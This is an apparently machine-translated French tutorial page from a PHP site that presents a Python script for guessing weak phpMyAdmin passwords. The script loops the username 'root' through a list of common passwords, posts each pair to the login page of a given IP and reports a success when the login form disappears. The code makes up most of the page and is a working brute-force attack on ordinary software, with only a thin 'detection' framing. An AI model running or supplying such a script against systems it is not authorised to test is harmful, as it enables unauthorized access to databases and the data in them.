Maison  >  Article  >  base de données  >  À propos de la tentative de mot de passe faible de PHPMyAdmin

À propos de la tentative de mot de passe faible de PHPMyAdmin

藏色散人
藏色散人avant
2021-05-27 15:55:133911parcourir

La colonne tutorielle suivante de phpmyadmin vous présentera la détection de mots de passe faibles de PHPMyAdmin. J'espère qu'elle sera utile aux amis dans le besoin !

PHPMyAdmin deviner un mot de passe faible [script Python]

PHPMyAdmin deviner un mot de passe faible

Capture d'écran de test :

Extrait de code

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
import requests
import time

username_list=['root']
password_list=['root','','admin','123456','password']

def phpMyAdmin(ip,port=80):
	for username in username_list:
		username =username.rstrip()
		for password in password_list:
			password = password.rstrip()
			try:
				#url = "http://192.168.106.141/phpmyadmin/index.php"
				url = "http://"+ip+":"+str(port)+"/phpmyadmin/index.php"

				data={'pma_username':username,'pma_password':password}
				response = requests.post(url,data=data,timeout=5)
				result=response.content
				if result.find('name="login_form"')==-1:
					print '===================================================='
					print '[+] find phpMyAdmin weak password:'+username,password
					print '===================================================='
					break
				else:
					print '[-] Checking for '+username,password+" fail"
			except:
				print '[-] Something Error'+username,password+" fail"
				
if __name__ == '__main__':
	phpMyAdmin("192.168.106.141")

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Déclaration:
Cet article est reproduit dans:. en cas de violation, veuillez contacter admin@php.cn Supprimer